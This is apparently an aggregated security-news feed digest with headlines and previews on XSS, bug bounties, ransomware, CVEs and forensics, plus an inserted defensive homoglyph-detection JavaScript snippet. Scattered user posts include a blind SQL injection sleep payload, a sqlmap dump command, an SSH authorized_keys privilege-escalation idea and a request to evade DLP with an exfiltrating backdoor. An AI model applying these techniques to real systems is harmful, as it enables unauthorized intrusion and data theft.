    @garethheyes has come up with yet another new XSS vector. It is the event handler called ontransitionend. This event handler fires when a transition, i.e. a CSS animation, ends, and for it to fire the element in question must be in a focused state. `display: block; transition: outline 1s; test` The above code is the basis; let's look at it a bit more. CSS Transition: a transition is a value in CSS that specifies the animation speed when a property changes. As shown below, it takes the CSS property to animate and a time value.
    Metasploit data into Httpx?
    It feels like a long time since I wrote a Metasploit-related post. The reason is that I found a plugin called netpen; with it, the information collected by Metasploit can be fed into a pipeline with other tools such as nuclei or zap/burp, which looked useful. Netpen is not an official plugin; it is a plugin script written by wdahlenburg that turns the information collected in Metasploit into a combo list in host:port form. It is a simple task, but collecting with Metasploit and then parsing the results again is a bit tedious, and this plugin solves exactly that. https://github.com/wdahlenburg/MSF-Plugins/blob/main/netpen.rb Add plugin: get the code from the repo and put it into Metasploit's plugin directory.
  • Open

    34 year old starting in Exploit Development, got a chance ?
    Hello there. I've done some pentesting work and jobs, but I have a passion to get into the exploit development and cracking field and am looking forward to getting a real-life job. However, I am 34 years old; do I still have a chance or will I be wasting time? submitted by /u/morizk90 [link] [comments]
  • Open

    How I Bypass 2FA while Resetting Password
    It was a private program on “Hackerone” , I had set target in my mind that I have to bypass 2fa, so I checked every method to bypass “Two… Continue reading on InfoSec Write-ups »
    Pythonic Malware Part-2: Reversing Python Executables
    In Pythonic Malware Part-1, I demonstrated how Python executables can be used to bypass Windows Defender and successfully launch… Continue reading on InfoSec Write-ups »
    A Facebook Bug that Disclosed Unused Custom Thumbnails of Any Facebook Page’s Public Videos
    No content preview
  • Open

    1-click RCE in Electron Applications
    How simple link opening leads to RCE Continue reading on Medium »
    Userland City — HackTheBox — Challenge — Web Exploitation — Writeup
    Hello guys I am back to posting another writeup. So let’s start talking instead of wasting our time lol. Continue reading on Medium »
    Neonify — HackTheBox — Challenge — Writeup — Web Exploitation
    Hello guys I am back to another writeup. So today we are talking about Neonify Web challenge. So let’s start talking about it. Continue reading on Medium »
    Nginxatsu — HackTheBox — Challenge — Writeup — Web Exploitation
    Hello guys we are back to posting another writeup about Web Exploitation challenge on HackTheBox. So let’s start talking about it. Continue reading on Medium »
    Pythonic Malware Part-2: Reversing Python Executables
    In Pythonic Malware Part-1, I demonstrated how Python executables can be used to bypass Windows Defender and successfully launch… Continue reading on InfoSec Write-ups »
    Aave V3’s Price Oracle Manipulation Vulnerability
    On April 7th, after Aave V3 had launched for 3 weeks, we discovered an issue on Aave V3’s price oracle. To be more specifically, the… Continue reading on Medium »
  • Open

    FBI: BlackCat ransomware has breached at least 60 entities worldwide
    Between November 2021 and March 2022, the BlackCat ransomware gang breached the network systems of at least 60 organizations worldwide.
    Five Eyes alliance issues advisory warning of Russian cyberattacks
    The Five Eyes cybersecurity agencies released a joint advisory warning of cyberattacks on critical infrastructure by Russian-backed attackers.
    FreeBuf enterprise group discussion | Let's talk about corporate HW (attack-defense exercise) operations
    With this year's HW exercise approaching, what new attack and defense trends will there be? What self-check measures can be taken before the exercise? What strange incidents have you run into during it?
    Vulnerabilities in the ALAC audio format threaten the privacy of more than half of Android users worldwide
    Researchers discovered vulnerabilities in the ALAC format last year; these could allow attackers to remotely access media and audio conversations on the target device.
    Serious bug in Android could allow access to users' media files
    Security analysts found that the implementation of the Apple Lossless Audio Codec (ALAC) is flawed.
    FreeBuf Weekly | Officials expose US cyberattack weapon "Hive"; three Lenovo vulnerabilities affect millions of computers
    Beneath the Internet that once seemed calm, undercurrents are surging: while we enjoy the services the Internet brings, countless backdoors and trojans have quietly embedded themselves in it.
    Instructors wanted | FreeBuf's premium open courses need you
    Do you have skills with nowhere to show them off, or an "interesting soul" that few know about? Don't worry! FreeBuf's premium open courses are tapping you on the shoulder and handing you an invitation. Come take a look!
    Careful, LinkedIn job resumes are being targeted by "bad guys"
    Malware called "more_eggs" is lurking in resumes to steal accounts related to the target companies.
  • Open

    Aave V3's Price Oracle Manipulation Vulnerability
    Article URL: https://medium.com/@hacxyk/aave-v3s-price-oracle-manipulation-vulnerability-168e44e9e374 Comments URL: https://news.ycombinator.com/item?id=31117915 Points: 2 # Comments: 0
  • Open

    If you have a WordPress site and have clients that require service from your company, please disable the admin login. This is just a lab machine, but as a blue teamer I see too much of this in the wild. I'm not releasing an email if your secure message site is not secure.
    submitted by /u/newworldsamurai3030 [link] [comments]
  • Open

    Bypass of fix #1370749
    Shopify disclosed a bug submitted by encryptsaan123: https://hackerone.com/reports/1489077 - Bounty: $900

  • Open

    After changing the storefront password, the preview link is still valid
    Shopify disclosed a bug submitted by tomorrow_future: https://hackerone.com/reports/1370749 - Bounty: $900
    Open redirect by the parameter redirectUri in the URL
    BlackRock disclosed a bug submitted by mrccrqr: https://hackerone.com/reports/1250758
    [h1-2102] [Plus] User with Store Management Permission can Make changeDomainEnforcementState - that should be limited to User Management Only
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1084892 - Bounty: $1900
    [h1-2102] [Plus] User with Store Management Permission can Make convertUsersFromSaml/convertUsersToSaml - that should be limited to User Management
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1084904 - Bounty: $1900
    [h1-2102] [PLUS] User with Store Management Permission can Make enforceSamlOrganizationDomains call - that should be limited to User Management Only
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1084939 - Bounty: $1900
    User with no Develop apps permission can Uninstall Custom App
    Shopify disclosed a bug submitted by ayyoub: https://hackerone.com/reports/1466855 - Bounty: $600
    [h1-2102] Improper Access Control at https://shopify.plus/[id]/users/api in operation UpdateOrganizationUserRole
    Shopify disclosed a bug submitted by ramsexy: https://hackerone.com/reports/1084638 - Bounty: $950
    Same the Url
    Shopify disclosed a bug submitted by 4bel: https://hackerone.com/reports/1459338 - Bounty: $500
    curl proceeds with unsafe connections when -K file can't be read
    curl disclosed a bug submitted by medianmedianstride: https://hackerone.com/reports/1542881
    Timing difference exposes existence of accounts
    Zivver disclosed a bug submitted by martinvw: https://hackerone.com/reports/1391636
  • Open

    Smashing the Modern Web Tech Stack — Part 1: The Evolving Threat Landscape in 2022 and DOM-based…
    This is the first post in a series called ‘Smashing the Modern Web Tech Stack.’ Modern Web Applications today are more complex than ever… Continue reading on Medium »
    Testnet Bug Bounty Winners List & Swappi Early Adopters Raffle
    Dear Swappicados: the winner list has final come! Continue reading on Medium »
    Open Redirect: Just a redirection?
    Greetings, everyone! i’m back with a new article after a long absence. In this writeup, i will attempt to explain everything i know about… Continue reading on Pentester Nepal »
    Vulnerability Research List
    Vulnerability Research OA/Middleware/Framework (Index). Open source products, foreign application software Continue reading on Medium »
    Open Redirection into Bentley System
    Hello, Hackers Welcome to another write-up where I have shared a scenario of Open Redirection… Continue reading on Medium »
    Weather App — HackTheBox — Challenge — Writeup — Web Exploitation
    Hello guys I am back to posting another writeup. It’s about Web again and yeah let’s start talking ;) Continue reading on Medium »
    Under Construction — HackTheBox — Challenge — Writeup — Web Exploitation
    Hello guys I am back to posting another writeup. So let’s start talking. So we can login to the page. I tried admin:admin and it didn’t… Continue reading on Medium »
    Toxic — HackTheBox — Challenge — Writeup — Web Exploitation
    Hello guys I am back. You may know me. My name is rootjkqsta. So today I was on HackTheBox pwning machines and challenges. So I saw this… Continue reading on Medium »
    LoveTok — HackTheBox — Challenge — Writeup — Web Exploitation
    Hello we are back to another writeup. Now we are talking about LoveTok It’s about Web Exploitation by the way! So let’s start talking. Continue reading on Medium »
    Breaking Grad — HackTheBox — Challenge — Writeup — Web Exploitation
    Hello ladies and gentlemen. I am back to posting a new writeup. Now we are talking about Breaking Grad Web Exploitation challenge. So… Continue reading on Medium »
  • Open

    malware analysis project
    Hello guys, I'm trying to build a Linux user-space backdoor with data exfiltration capabilities, but I'm thinking about data loss prevention software, DLP (endpoint protection). My question is, how to overcome this protection? And if someone has resources about a topic similar to mine, can you help? submitted by /u/Mind-Thief1122 [link] [comments]
    how to secure port 135
    I understand the importance of having the RPC service enabled for Windows to function properly, but it poses a lot of risk in the online world. What is the general best practice to keep this port secured? submitted by /u/Playful-Net9746 [link] [comments]
    How many IRemoteWinSpool RDP binds are "normal" when not printing?
    I've been noticing IRemotewinspool rdp binds from some of our PCs. It got my attention because of PrintNightmare and the fact that none of us have been printing anything. I'm trying to find more information about this online but I can't find anything about "normal" IRemoteWinsPool amongst all the PrintNightmare stuff. Should the service be used without anybody printing? Thank you submitted by /u/techsupportwantedpls [link] [comments]
    Any good tools for finding sequential keys in a batch of requests?
    Hello, I'm looking for a tool to search through the responses from a batch of HTTP requests and find values that might be sequential keys; bonus points if it can replay the requests and verify the value is in fact a sequential key. Thanks submitted by /u/quickmodel_ai [link] [comments]
    Linux question for an application 'bug' I'm trying to tease out
    I've been playing with a proprietary Linux agent recently. It runs as root and it allows non-root users to arbitrarily set the location of its log files. I can change the location of the log files to anywhere on the file system. I can also, mostly, change the file name. The key issue being that the software appends the date to any filename I choose, though! For example, I discovered I can set the logfile name and location to here: /root/.ssh/authorized_keys_20220202. I can 'log' my own SSH key into the file contents too. If I could get the file named correctly it would work (which I tested), but I can't. The authorized key is ignored in that name format, which is completely understandable. Do you think this limitation in my ability to control the full file name means I'm done? I've been thinking about other services I know of like .rhosts but I think the same issue would exist. Anyone got any good ideas? submitted by /u/shite_in_a_bucket [link] [comments]
    Advice on getting more interviews for threat intelligence jobs?
    If this is too broad or just generally not allowed here I can delete this. I'm trying to pivot to cyber security and I'm applying for threat intelligence jobs because I already have a strong background in intelligence (DOD, IC, military). What can I do to increase my chances of getting interviews and offers? I have Network+, am scheduled to take Security+ this summer, and after that I'm looking to get another cert (possibly CEH). I also have a TS/SCI and my intelligence background is technical analysis (signals intelligence, network analysis, etc.). Currently dual-hatting as a SME analyst and as a front-end developer (HTML, CSS, JS, Angular). Also an advanced beginner / early intermediate Python coder and I've done personal projects to visualize IP connections and Wi-Fi survey type stuff. I've played around with Kali Linux before and DNSdumpster, Whois, Shodan, etc., so I'm comfortable learning technical tools and data. Also planning to deep dive into threat intel feeds and maybe set up my own dashboards for fun and for learning. Have already had 2 screening calls but I really want to break out of plain old DOD intel work and get into something technical and challenging. Any advice is greatly appreciated! P.S. Longer term I'd really like to get into threat hunting but I have 0 experience with any of that so I figured threat intel would be a good way to break into the industry for starters. submitted by /u/WLANtasticBeasts [link] [comments]
  • Open

    Encase Acquisition to forensics mode
    Yes, I'm bringing this post back to the spotlight. I cannot get EnCase to go into forensics mode. I have admin privilege over the system, my keys are active, and I've tried it on 3 different versions. Are there any tips on how to get this working? submitted by /u/Metriczcaptian88 [link] [comments]
    Forensic Certifications
    Hi all, I want to get into digital forensics and was wondering what certifications I should get that will help me get a digital computer forensics job in the public / private sector (FBI, DHS, DOJ, etc.). Also, what would be the best way to prepare for them? Currently I have the Sec+ and A+ certs and some programming experience. submitted by /u/Fortune_Technical [link] [comments]
    Simple Question about Disk Imaging
    Yes, I am a newbie; yes, I am just a clueless college student... I am not asking this question so you can tell me how stupid I am or for you to show how smart you are. Your boss is not going to see your response on a reddit post and give you a raise over it... So remember, please be nice. My question: How do forensic investigators create the disk image of a computer without having the password to the computer? I can use FTK Imager, Guymager, etc... But realistically, how will you use these programs when presented with a victim's computer to which you don't know the password? Thank you lots! submitted by /u/uTeC3 [link] [comments]
    RAM/Memory Dump of iOS devices
    Hi community, for my recent project I'm wondering if it is possible to take a RAM/memory dump of an iOS device. I saw that for Android it is possible to take a system dump using adb. Is there any tool that works the same for iOS? Any suggestions would be great. Thanks submitted by /u/Aromatic_Ideal_2933 [link] [comments]
  • Open

    Home-Grown Red Team: Testing Common AV Evasion With PE Packers On Windows 11
    Bypassing AV solutions is essential for initial access, lateral movement and full domain compromise. Over the last couple of years, we’ve… Continue reading on Medium »
    How To Get The Most Out Of Pen Tests
    I recently wrote an article for the CyCognito blog on getting the most out of pen tests. Pen tests are needed and, when properly done… Continue reading on Medium »
    RED TEAM | KLSFP Certification
    What is Red Teaming? Continue reading on Medium »
    How do I take over Cobalt Strike Team Servers
    Hi folks, today I would like to share how I take over some Cobalt Strike TeamServers with Quake and Password Spray Attack. From the… Continue reading on Medium »
  • Open

    Threat Assessment: BlackByte Ransomware
    BlackByte is ransomware as a service that emerged in July 2021. Read our overview and recommended courses of action for mitigation. The post Threat Assessment: BlackByte Ransomware appeared first on Unit42.
  • Open

    Maltego’s Attempts at Cryptocurrency Investigations
    Maltego is haunted by the laurels of grandiose cryptocurrency investigations… Continue reading on Medium »
    War in Ukraine / April 20
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Another cyberdetective trap
    I came across an interesting GPS tracker https://osmodroid.ru, https://osmo.mobi/app project that allows you to get a digital fingerprint… Continue reading on Medium »
    Recon tools for webapp penetration testing Part-1 (WebProxies & DNS Discovery) tools
    Here are some webapp penetration tools Continue reading on Medium »
    How do I take over Cobalt Strike Team Servers
    Hi folks, today I would like to share how I take over some Cobalt Strike TeamServers with Quake and Password Spray Attack. From the… Continue reading on Medium »
  • Open

    Keeping Up With PHP Updates
    Staying on top of critical security risks and vulnerabilities is imperative for the safety of your website. Some of the types of threats impacting our client sites include injections, broken authentication, cross site scripting, or even attackers targeting components with known vulnerabilities. In this post, we’ll be going over why outdated PHP versions can lead to an increase in vulnerabilities with your website and how you can minimize these risks to protect your site and your visitors. Continue reading Keeping Up With PHP Updates at Sucuri Blog.
  • Open

    SecWiki News 2022-04-21 Review
    Using neural networks to mine common features to discover unknown APTs by ourren; BinAbsInspector: an automated static vulnerability detection tool for binaries by ourren; A glimpse at the world's lowest-latency network by Avenger; Attack and detection of WMI backdoor techniques by ourren. For more of the latest articles, visit SecWiki
  • Open

    JBoss EAP/AS <= 6.* RCE - A little bit beyond \xAC\xED
    submitted by /u/j_jjjj [link] [comments]
    Hello all, I have released a new version of SCodeScanner v2.1.0, which contains advanced rules and some additional features. Features include removing false positives and sending the output file directly to Jira and Slack. More info: https://github.com/agrawalsmart7/scodescanner & https://scodescanner.info.
    submitted by /u/agrawal7 [link] [comments]
    CVE-2022-21449 PoC demonstrating TLS MITM
    submitted by /u/kmhn [link] [comments]
  • Open

    Official heavyweight report fully exposes US cyberattack weapon "Hive"
    Beneath the Internet that once seemed calm, undercurrents are surging: while we enjoy the services the Internet brings, countless backdoors and trojans have quietly embedded themselves in it.
    Knowledge Continent recruitment | The future is here, and so are you
    This round recruits 3 "lords"! Come join in building and sharing the Knowledge Continent together!
    FreeBuf Morning Report | Russian APT groups continue to target Ukraine; BlackCat ransomware breaches 60 entities worldwide
    Between November 2021 and March 2022, the BlackCat ransomware gang breached the networks of at least 60 organizations worldwide.
    REvil's TOR site is back online; a wave of new ransomware may be on the way
    Recent research shows that the REvil ransomware's servers on the TOR network have resumed normal operation after months of silence.
    FBI warns of ransomware attacks targeting the US agricultural sector
    The US Federal Bureau of Investigation (FBI) warned the Food and Agriculture (FA) sector that ransomware gangs are "more likely" to launch cyberattacks against it during the harvest and planting seasons.
    NATO's 2022 "Locked Shields" cyber exercise held in Estonia, with 2,000 security experts training together
    The NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE) organized the 2022 "Locked Shields" cyber exercise from April 19 to 22.
    "Anheng Cybersecurity March Monthly Report" | One report covering March's underground economy, vulnerabilities, APT, ransomware, hidden links and other summary information
    One report covering March's underground economy, vulnerabilities, APT, ransomware, hidden links and other summary information.
  • Open

    Exploiting Security Checks on Bind Mount
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Solving the pagecontext problem of the Godzilla memory shell
    Author: Y4er. Original link: https://y4er.com/post/solve-the-problem-of-godzilla-memory-shell-pagecontext/ Preface: For injecting memory shells with current webshell tools, Behinder (冰蝎) solves this by creating a HashMap, putting request, response and session into it, and replacing pagecontext: HttpSession session = ...
  • Open

    What do you need to know to develop expert-level exploits?
    Developing professional-level 0day and silent exploits, breaking them, for example jpeg, word macro, etc. What needs to be learned to write advanced exploits? I'm learning C and C++; I work 8 hours a day, and in the remaining 2 hours I work on Python. What do you think I need to learn to write and understand exploits at a full professional level? submitted by /u/Sargatanas_ [link] [comments]
  • Open

    Know The Difference Between XSS vs CSRF
    Cross-site Scripting (XSS) and Cross-site request forgery (CSRF) are very common client-site attacks against web applications. While XSS… Continue reading on Medium »
  • Open

    [Security Bulletin] Atlassian Bitbucket Data Center remote code exec...
    Recently, Atlassian released a security advisory fixing a code execution vulnerability in Atlassian Bitbucket Data Center. This vulnerability...
  • Open

    Best Practice Regarding iMessage Sync In UFED iOS Extraction Scenarios
    What exactly happens to iMessage data (attachments and message content) when the Message Sync button found at Settings>name>iCloud>Messages is enabled? Does the data leave the device and join the cloud where it is then synced across other iOS devices that belong to the user or does this data remain locally with a copy of this data existing in the cloud? Perhaps a mixture of the two occurs? Within the context of a forensic iOS data extraction via UFED, I have some colleagues who believe it’s best practice to disable message sync prior to the extraction attempt so that the messages are downloaded back to the device and are included in the subsequent extraction dataset. In contrast, I have other colleagues who claim iMessage data never truly leaves the sms.db so even if message sync is enabled, extraction via UFED should result in all iMessage data being captured anyway. This article from Elcomsoft seems to somewhat support the latter theory, albeit vaguely. I haven’t been able to find any other research into this. What are your thoughts? What is best practice for forensic iOS data extraction when Message Sync is enabled? Do you disable Message Sync and wait for whatever is happening to finish or do you just perform the data extraction with no regard for the Message Sync setting? submitted by /u/ucfmsdf [link] [comments]
    FTK imager recover deleted files
    Hi guys, I'm new to FTK Imager. I have created a separate D: drive on my Windows machine and deleted some files from it. In FTK Imager I created a new disk image of the logical drive in raw format. I see the deleted files and click on export file. After opening the exported file I get an error saying "The file can't be opened. That might be because the file type is unsupported, the file extension is incorrect, or the file is corrupt." Any idea what I'm doing wrong? submitted by /u/Fortune_Technical
    No boot after conversion of .E01
    Hello everyone! I'm trying to convert an .E01 to a VMware machine, but every time I try to start the virtual machine there is no bootable device. I tried to mount the forensic image with FTK Imager as a physical disk (writable, without logical unit) and open it with VMware. Also, I tried with Oracle VM VirtualBox and Mount Image Pro v7 without results. I also tried the conversion using vboxmanage.exe, using the result file with VMware Player. https://preview.redd.it/9a6ob5cmspu81.jpg?width=722&format=pjpg&auto=webp&s=3cac78e0145092fc785c3a00e4356c83418aaa06 Can someone help me, please? I need to run the OS inside my .E01 file to run a specific software. submitted by /u/Zipper_Ita

    What VPS to choose?
    There are tons of cloud providers that offer different types of servers with a lot of different options. I will talk about the ones I… Continue reading on Medium »
    Exploiting a File Upload Vulnerability — A Directory Traversal Attack
    Hello people, happy to have you here once again. I do hope you enjoy this write-up as much as I enjoyed ‘writing’ it. I would have to… Continue reading on Medium »
    Container Escape Vulnerability in AWS Hot Patch
    Update or mitigate now if you are affected (if you run containers, you probably are.) Continue reading on Cloud Security »
    Hacked REDBUS WordPress plugin and able to perform Cross-site Scripting Vulnerability….
    Hello, hackers! Welcome back to another write-up where I have shared a scenario of a WP_plugin being vulnerable to Cross-site Scripting… Continue reading on Medium »
    youtube.com or уoutube.com??
    As you can see, both of them look identical, but the second уoutube.com won't work. Your first reaction: "How the hell it's… Continue reading on Medium »
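The trick in the title above is a homoglyph: the first letter of the second domain is the Cyrillic "у" (U+0443), not the Latin "y". The following is an added example, not code from the linked article, showing how to spot such a hostname programmatically: it flags non-ASCII and mixed-script labels, shows the punycode (xn--) form that DNS and TLS actually see, and collapses a few visually identical Cyrillic letters to their Latin twins to find which brand a domain impersonates. It assumes Node.js 14 or later; the lookalike map is a small hand-picked subset, not a complete Unicode confusables table.

```javascript
// Added example (not from the linked article): inspect a hostname for the
// homoglyph trick above. Assumptions: Node.js >= 14 (for \p{Script=...} regex
// support and the WHATWG URL class); the Cyrillic-to-Latin map below is a small
// hand-picked subset, not a complete Unicode confusables table.

// Cyrillic letters whose lowercase glyphs are visually identical to Latin ones
// in most fonts (subset; assumption, not an exhaustive list).
const CYRILLIC_LOOKALIKES = {
  '\u0430': 'a', '\u0435': 'e', '\u043e': 'o', '\u0440': 'p',
  '\u0441': 'c', '\u0443': 'y', '\u0445': 'x', '\u0456': 'i',
  '\u0458': 'j', '\u04bb': 'h',
};

// Collapse each lookalike to the Latin letter a human would read it as.
function skeleton(host) {
  return host.normalize('NFC').toLowerCase()
    .split('')
    .map(ch => CYRILLIC_LOOKALIKES[ch] || ch)
    .join('');
}

function analyzeHostname(host) {
  const lowered = host.normalize('NFC').toLowerCase();
  const nonAscii = /[^\x00-\x7f]/.test(lowered);
  const scripts = [/\p{Script=Latin}/u, /\p{Script=Cyrillic}/u, /\p{Script=Greek}/u]
    .filter(re => re.test(lowered)).length;
  // The WHATWG URL parser applies IDNA processing, so .hostname is the
  // punycode (xn--) form that DNS and TLS actually see.
  let ascii = null;
  try { ascii = new URL('http://' + lowered + '/').hostname; } catch (e) { /* unparsable */ }
  return {
    input: host,
    ascii,
    nonAscii,
    mixedScript: scripts > 1,
    suspicious: nonAscii || scripts > 1,
  };
}

// Returns the brand domain this host impersonates, or null if it is either
// genuinely that domain or not a lookalike of any listed brand.
function lookalikeOf(host, brands) {
  const lowered = host.normalize('NFC').toLowerCase();
  const sk = skeleton(host);
  for (const brand of brands) {
    if (sk === brand && lowered !== brand) return brand;
  }
  return null;
}

// Constructed inputs: the real domain and the one from the title, spelled with
// a Cyrillic "у" (U+0443) in place of the Latin "y".
const REAL = 'youtube.com';
const FAKE = '\u0443outube.com';
const BRANDS = ['youtube.com', 'google.com', 'paypal.com'];

for (const h of [REAL, FAKE]) {
  console.log(analyzeHostname(h), 'impersonates:', lookalikeOf(h, BRANDS));
}
```

The mixed-script check is the cheap, high-signal test: a single label that contains both Latin and Cyrillic letters has almost no legitimate use, which is why browsers fall back to showing the xn-- form for such names.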
    CVE-2022–29072 Windows Privilege Escalation
    7-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the… Continue reading on Medium »

    Survey website that only allows one submission a month
    My company has a survey that only allows one submission a month. All other submissions are not counted or reviewed. I'm assuming that the website tracks IPs. I want to ensure that I cannot be traced back to my survey, and I want to be able to submit multiple surveys a month. Would a VPN protect my identity? Is there another way that the company could be tracking me or submissions? submitted by /u/thukirby
    Question about Blind SQL injection?
    Hi, I was wondering if someone could shed some light. I was currently scanning my site testing out Wapiti and was shocked to find 11 blind SQL injections, which I'm thinking is a false alert. What's odd is that no part of the website I tried accessing shows any errors:
        /_next/image?url=%2F_next%2Fstatic%2Fimage%2Fpublic%2Fimg%2Fbanners%2Fbanner-XXX-XXXX-XXX-XXX.2d09a971dce1f42dXXXXXXXXX.jpg%2Csleep%287%29%231&w=1200&q=75 HTTP/1.1
    I tried it in sqlmap but I'm not sure if that was the correct mapping:
        sqlmap -u "https://mydomain/_next/image?url=75*" --dbs --level=5 --risk=3 --dump --batch --tamper=space2comment --threads 10
    Thank you. submitted by /u/killmasta93

    $10k Host header vulnerability in Google App Engine
    Article URL: https://sites.google.com/site/testsitehacking/10k-host-header Comments URL: https://news.ycombinator.com/item?id=31102998 Points: 2 # Comments: 0
    Java 15 introduced a cryptographic vulnerability
    Article URL: https://www.itnews.com.au/news/java-15-introduced-a-cryptographic-vulnerability-578958 Comments URL: https://news.ycombinator.com/item?id=31096184 Points: 79 # Comments: 31

    Open Akamai ARL XSS at
    U.S. Dept Of Defense disclosed a bug submitted by whoisbinit: https://hackerone.com/reports/1317024
    Full account takeover in due lack of rate limiting in forgot password
    U.S. Dept Of Defense disclosed a bug submitted by takester: https://hackerone.com/reports/1059758
    vulnerable to CVE-2022-22954
    U.S. Dept Of Defense disclosed a bug submitted by null_bytes: https://hackerone.com/reports/1537694
    CORS Misconfiguration
    U.S. Dept Of Defense disclosed a bug submitted by shirshak: https://hackerone.com/reports/1530581
    Reflected XSS in the shared note view on https://evernote.com
    Evernote disclosed a bug submitted by sarka: https://hackerone.com/reports/1518343 - Bounty: $500

    looking for an exploiter who can create gametools for an online game
    submitted by /u/dr4iner
    Career Change Options: Binary Exploitation or Pentesting/Red Teaming
    Hi all, I currently do incident response and threat hunting for an organization and have lost the passion. A few months ago, I found binary exploitation and liked it. However, I'm stuck on a roadmap. I thought of moving laterally to the red team side, thinking it would be a good foundation. However, with pentesting there would be a lot to learn since your skills need to be broad. I also wouldn't have the chance to create exploits. I want to develop exploits and find new vulnerabilities. I have been doing RE and malware analysis for some time now as a side hobby, plus some binary exploitation courses. As a security professional, my interests and goals right now are to break tech (new and old) and find unique and creative ways of entering. Wondering what a good path/roadmap to take to get into vulnerability research? The way I see it there are two options: (1) Get into pentesting (AD and web) to learn the building blocks and do VR on the side. Find the area you want to specialize in and focus on the vulns there. Gain experience and do red teaming. (2) Find a codebase and platform within a bug bounty platform, research the hell out of it, and start poking around. Maybe move into AppSec. Very new to this side of the house, so please feel free to correct me or add your opinions. Thanks! submitted by /u/SushiSush1

    Threat Hunting for Phishing Pages
    submitted by /u/mstfknn
    CVE-2022-21449 detector - Finds possibly vulnerable JAR/WAR files
    submitted by /u/SRMish3
    A Detailed Analysis of The SunCrypt Ransomware
    submitted by /u/CyberMasterV
    SSRF Attack Examples and Mitigations
    submitted by /u/benarent
    CVE-2022-21449: Psychic Signatures in Java
    submitted by /u/Gallus

    JDK CVE-2022-21449
    Article URL: https://access.redhat.com/security/cve/cve-2022-21449 Comments URL: https://news.ycombinator.com/item?id=31101123 Points: 2 # Comments: 0
    Jira Server and Jira Data Center CVE-2022-0540 – Authentication Bypass in Seraph
    Article URL: https://community.atlassian.com/t5/Jira-articles/Jira-Server-and-Jira-Data-Center-CVE-2022-0540-Authentication/ba-p/2006104 Comments URL: https://news.ycombinator.com/item?id=31100115 Points: 4 # Comments: 0
    CVE-2022-29153: To Consul or Not to Consul
    Article URL: https://ronin.ae/news/2022/04/15/CVE-2022-29153-to-consul-or-not-to-consul.html Comments URL: https://news.ycombinator.com/item?id=31093969 Points: 1 # Comments: 1

    OSINT in VKontakte
    Today I will analyze the main sources of data that I use when conducting OSINT investigations on the Russian social network VKontakte. Continue reading on Medium »
    War in Ukraine / April 19
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »

    SecWiki News 2022-04-20 Review
    A brief discussion of attack-and-defense exercises by ourren. For more of the latest articles, visit SecWiki

    FreeBuf Morning Report | MIIT names 37 apps that infringe on user rights; a real-time speech algorithm can block microphone eavesdropping
    Researchers at Columbia University explain that the algorithm works predictively: it infers what the user will say next and generates blocking background noise in real time to cover the speech.
    Warning! Catalan politicians and activists targeted by spyware
    An inconspicuous zero-click vulnerability may have been exploited early on to install spyware from the Israeli firms NSO and Candiru.
    New BotenaGo malware variant targets DVR devices
    Threat analysts recently discovered a new variant of the BotenaGo botnet malware.
    CISA warns that attackers are exploiting a Windows vulnerability
    CISA has added a local privilege escalation vulnerability in the Windows Print Spooler to its Known Exploited Vulnerabilities catalog.
    ESET warns that three Lenovo vulnerabilities affect millions of computers
    ESET researchers reported the three serious security vulnerabilities to Lenovo in October 2021; all of them have now been fixed.
    Surging numbers: LinkedIn has become phishers' favorite
    LinkedIn phishing activity rose sharply in the first quarter of this year and now accounts for 52% of phishing worldwide, topping the rankings.
    FreeBuf Morning Report | CIA's mainstay cyber weapon "Hive" exposed; Lenovo firmware vulnerabilities affect millions of computers
    Recently, the National Computer Virus Emergency Response Center found that the "Hive" malicious code attack and control weapon platform is a mainstay cyber weapon dedicated to the US Central Intelligence Agency (CIA).

    Burp Suite Extensions for Web Hunting
    Introduction Continue reading on InfoSec Write-ups »
    $1000: How I could have Hack any account and become a billionaire overnightTop Crypto-Trading….
    Create Bind and Reverse Shells using Netcat

    Alright guys, can someone help me find this attack I'm doing??
    So I received the following from my ISP. I received 4 other ones last week, and I believe that I have identified the machine. It's a desktop PC running Linux Mint. I'm okay with Linux; I've run a couple of headless servers before and used Ubuntu as a daily driver for a couple of years, but outside of tasks I needed to complete my knowledge is not high. I can't find anything in any logs that indicates this activity, but I'll be honest, I don't even know how deep I'm looking. I also have no idea where I could have picked up a script like this either. I'm likely gonna just nuke the machine and get a new IP address from my ISP, but I'd like to try and isolate this first. My IP has been redacted, but everything is there otherwise. The previous failed attacks were all trying to breach German IPs; I can post those too if they would help.
    A device using your connection attempted to access another network without authorization.
        Apr 18 16:02:58 li352-240 sshd[2818468]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=XXXXXX user=root
        Apr 18 16:03:00 li352-240 sshd[2818468]: Failed password for root from XXXXX port 51808 ssh2
        Apr 18 16:03:01 li352-240 sshd[2818468]: Received disconnect from XXXXX port 51808:11: Bye Bye [preauth]
        Apr 18 16:03:01 li352-240 sshd[2818468]: Disconnected from authenticating user root XXXXX port 51808 [preauth]
        Apr 18 16:03:02 li352-240 sshd[2818491]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=XXXXX user=root
        ..........
    submitted by /u/Beginning-Pace-1426
    CHFI EXAM
    I am taking my EC-Council CHFI cert in a week. As I have seen, people are not fans of this cert or EC-Council (it was free, otherwise I would have chosen a different one). That all being said, I am taking the version 9 exam and the study material is outdated, along with the labs and book they provide. So, people who have taken it, what is the best way to study? I have found exam questions and a few people said most of those questions are on the exam. Thank you, just trying to be ready for it. submitted by /u/Critical-Balance7980
    How to convert a pcap file to an image file?
    I want to convert my pcap file to a PNG format file. submitted by /u/One-Ad2289
    What should I study for this job application?
    Hi everyone, I'm applying for a digital forensics job in LE and the first stage is a test. I have read the FAQs in this subreddit but found nothing about what to expect in job application tests (not interviews). The application states that applicants should prepare for the test by studying the following (roughly translated to English): legal measures for digital evidence collection and chain of custody; digital forensics; operating systems; file systems; Windows registry; OSINT (open source intelligence). I have some knowledge of all these subjects but I'm by no means an expert. What should I focus on while studying so that I can cover most bases? submitted by /u/InfoSecSensei
    It’s not always clear which US Gov jobs are digital Forensics, so I’ve created a scraper!
    submitted by /u/Strijdhagen
